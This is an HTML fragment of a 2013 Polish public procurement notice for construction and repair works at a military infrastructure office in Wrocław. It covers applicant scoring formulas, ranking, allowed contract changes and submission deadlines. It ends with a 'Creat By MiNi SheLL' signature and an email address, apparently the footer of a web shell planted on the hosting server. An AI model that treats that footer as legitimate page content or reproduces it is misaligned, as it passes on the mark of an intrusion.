<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Opis sposobu dokonywania oceny spełniania warunków:
1.  Zamawiający sprawdzi formalną stronę uczestnictwa Wykonawcy w postępowaniu i określi czy każdy z wniosków spełnia wymagane warunki, czy została ona prawidłowo podpisana oraz czy jest zgodna z wymaganiami przedstawionymi w materiałach przetargowych.
a) Wykonawca, który posiada doświadczenie w realizacji robót budowlanych,
oraz wykonał z należytą starannością co najmniej:
1)	co najmniej jedną przebudowę lub remont obiektu o kubaturze nie mniejszej jak 1000 m3
oraz 
2)	co najmniej jeden  remont placów postojowych/ manewrowych i chodników o powierzchni nie mniejszej niż 500 m2, 
spełnia w stopniu minimalnym warunek doświadczenia. 
b)  Wykonawcy który wykonał więcej robót polegających na:  
1)	co najmniej jedną przebudowę lub remont obiektu o kubaturze nie mniejszej jak 1000 m3
oraz 
2)	co najmniej jeden  remont placów postojowych / manewrowych i chodników o powierzchni nie mniejszej niż 500 m2.
Zamawiający przyzna punkty wg następującego kryterium ustalonego wg ważności z określeniem  znaczenia tj. procentowego udziału w  cenie na zasadzie proporcji:
a)	doświadczenie, że wykonał co najmniej jedną przebudowę lub remont obiektu o kubaturze nie mniejszej jak 1000 m3 - waga kryterium 75% 
b)	doświadczenie, że wykonał co najmniej jeden  remont placów postojowych/ manewrowych i chodników o powierzchni nie mniejszej niż 500 m2 - waga kryterium 25% 
	   
       C a
Aa =                 x 100 pkt. x 75%
          C a_max

Gdzie:  C a_max - maksymalna ilość referencji potwierdzających doświadczenie w zbiorze a wniosków.
             C a       - ilość referencji potwierdzających doświadczenie a wniosku badanego.
            Aa       - ilość punktów uzyskana za kryterium doświadczenie a.


       C b
Ab =                 x 100 pkt. x 25%
           C b_max


Gdzie:  C b_max - maksymalna ilość referencji potwierdzających doświadczenie w zbiorze b wniosków.
             C b       - ilość referencji potwierdzających doświadczenie b wniosku badanego.
            Ab       - ilość punktów uzyskana za kryterium doświadczenie b.


W= Aa + Ab 

Gdzie: W - suma wskaźników ofert.
           Aa       - ilość punktów uzyskana za kryterium doświadczenie a.
Ab       - ilość punktów uzyskana za kryterium doświadczenie b


2. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie złożonych oświadczeń i dokumentów wg formy spełnia / nie spełnia.
3.  Na podstawie ilości uzyskanych punktów przez Wykonawców zostanie utworzony ranking, według którego Zamawiający zaprosi do składania ofert nie więcej niż 5  (pięciu) Wykonawców z największą liczbą punktów. 
W przypadku uzyskania jednakowej ilości punktów, o kolejności będzie decydować sumaryczna wartość wykonanych robót brutto wykazanych w załączonych przez Wykonawcę wykazach.
4.  Zamawiający niezwłocznie poinformuje o wynikach oceny spełniania warunków udziału w postępowaniu i otrzymanych ocenach spełniania tych warunków, Wykonawców, którzy złożyli wnioski o dopuszczenie do udziału w postępowaniu.
5.  Jeżeli liczba Wykonawców, którzy spełniają warunek udziału w postępowaniu, jest mniejsza niż określona w ogłoszeniu o zamówieniu (tj. pięciu), Zamawiający zaprosi do składania ofert wszystkich Wykonawców spełniających te warunki.

Jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu, 
jest zbyt niska, aby zapewnić rzeczywistą konkurencję, zamawiający może:
1)	zawiesić postępowanie i ponownie opublikować ogłoszenie o zamówieniu, określając, z zastosowaniem przepisów dotyczących terminów składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, nowy termin składania wniosków odpowiednio w trybie przetargu ograniczonego, oraz informując o tym wykonawców, którzy spełniają warunki udziału w postępowaniu, albo
2)	unieważnić postępowanie i wszcząć nowe postępowanie o udzielenie zamówienia. 
3)	W przypadku, o którym mowa w pkt 2, zamawiający zaprasza 
do udziału w postępowaniu wszystkich Wykonawców, którzy odpowiedzieli na pierwsze lub drugie ogłoszenie o zamówieniu i spełniają warunki udziału 
w postępowaniu.

Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu, jest większa niż określona w ogłoszeniu o zamówieniu (tj. pięciu), Zamawiający zaprosi do składania ofert Wykonawców, którzy otrzymali najwyższe oceny spełniania warunków udziału w postępowaniu. Wykonawcę niezaproszonego do składania ofert traktuje się jak wykluczonego z postępowania.

6. Wraz z zaproszeniem do składania ofert Zamawiający przekaże Wykonawcy specyfikację istotnych warunków zamówienia.
7.  Termin otwarcia ofert: zgodnie z art. 52 ust. 2 i 5 Ustawy Pzp</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w zakresie: 
1.	Terminu wykonania przedmiotu umowy w przypadku:
a)	wystąpienia okoliczności uniemożliwiających realizację robót w terminie umownym. Za okoliczności takie uważa się wstrzymanie robót przez Zamawiającego, wystąpienia okoliczności niezależnych od Wykonawcy, w tym wynikających z tzw. siły wyższej (np. powodzie, huragany, gwałtowne burze) uniemożliwiających realizację robót. Wstrzymanie robót z tego powodu musi być potwierdzone w dzienniku budowy i zaakceptowane przez inspektora nadzoru. Wstrzymanie robót budowlanych ze względu na warunki atmosferyczne typowe (właściwe) dla danej pory roku i miesiąca, lub zła organizacja robót nie uzasadniają zmiany terminu umowy,
b)	stwierdzenia, że w dokumentacji projektowej przekazanej dla Wykonawcy zgodnie z § 1 ust. 2 umowy, znajdują się błędy uniemożliwiające prawidłowe i terminowe wykonanie przedmiotu umowy,
c)	zmniejszenia lub zwiększenia ilości jednostek obmiarowych,
d)	obiektywnie uzasadnionej konieczności wprowadzenia zmiany technologii wykonania przedmiotu umowy; zmiana zakresu prac określonych w SIWZ jest możliwa tylko w zakresie niezbędnym do zgodnego a obowiązującymi standardami, wymaganiami technicznymi oraz normami prawidłowego wykonania przedmiotu umowy lub ze względu na interes Zamawiającego wynikający z możliwości obniżenia kosztów robót lub skrócenia terminu realizacji robót,
e)	zmiany limitów finansowych określonych w centralnych planach rzeczowych resortu obrony narodowej,
f)	zawarcia umowy na zamówienie dodatkowe, którego realizacja trwa więcej niż 7 dni roboczych,
g)	wydłużenia procedury przetargowej (spowodowanej m. in. przedłużeniem przez Zamawiającego terminu związania ofertą, wpłynięcia odwołania),
h)	ujawnienia się w trakcie realizacji przedmiotu zamówienia przeszkód w obiekcie lub gruncie,
i)	ujawnienia się w trakcie realizacji przedmiotu umowy nieprzewidzianych przeszkód formalno-prawnych,
j)	konieczności wykonania robót dodatkowych. 
2.	Wynagrodzenia Wykonawcy w przypadku:
a)	zmniejszenia lub zwiększenia ilości jednostek obmiarowych - w zakresie mającym wpływ na ustaloną kwotę wynagrodzenia,
b)	obiektywnie uzasadnionej konieczności wprowadzenia zmiany technologii wykonania przedmiotu umowy; zmiana zakresu prac określonych w SIWZ jest możliwa tylko 
w zakresie niezbędnym do zgodnego a obowiązującymi standardami, wymaganiami technicznymi oraz normami prawidłowego wykonania przedmiotu umowy lub 
ze względu na interes Zamawiającego wynikający z możliwości obniżenia kosztów robót lub skrócenia terminu realizacji robót, 
c)	wystąpienia robót dodatkowych, 
d)	zmiany powszechnie obowiązujących przepisów prawa w szczególności przepisów prawa podatkowego.
3.	Wysokości limitów w przypadku zmiany limitów finansowych określonych w centralnych planach rzeczowych resortu obrony narodowej.
4.	Zmiany kierownika budowy lub kierownika robót, pod warunkiem, że nowa osoba będzie spełniać wymagania określone w SIWZ dla danej funkcji.
5.	Zmiany zakresu robót realizowanych przez podwykonawcę, wskazanych w Formularzu nr ...., lub powierzenia części zamówienia podwykonawcy mimo braku takiego wskazania w Formularzu nr ...., z przyczyn obiektywnie uzasadnionych. 
6.	Wprowadzenia rozwiązań (robót) zamiennych w stosunku do rozwiązań przewidzianych w projekcie. Wprowadzenie rozwiązań (robót) zamiennych może mieć również wpływ na zmianę terminu realizacji zadania i wynagrodzenia Wykonawcy.
7.	Wszelkie zmiany do niniejszej umowy wymagają pod rygorem nieważności zachowania formy pisemnej poprzez spisanie aneksu.
8.	Wykonawca zobowiązuje się do informowania Zamawiającego o zmianie formy prowadzonej działalności oraz zmianie adresu siedziby firmy i zamieszkania jej właściciela, pod rygorem uznania korespondencji kierowanej na ostatni podany przez Wykonawcę adres za doręczony. Powyższe zobowiązanie dotyczy okresu obowiązywania umowy, rękojmi gwarancji oraz nie zakończonych rozliczeń wynikających z umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rziwroclaw.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury we Wrocławiu, ul. Obornicka 126,  	50-984 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2013 godzina 10:00, miejsce: Rejonowy Zarząd Infrastruktury we Wrocławiu, ul. Obornicka 126,  	50-984 Wrocław, pokój nr 101 (kancelaria jawna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com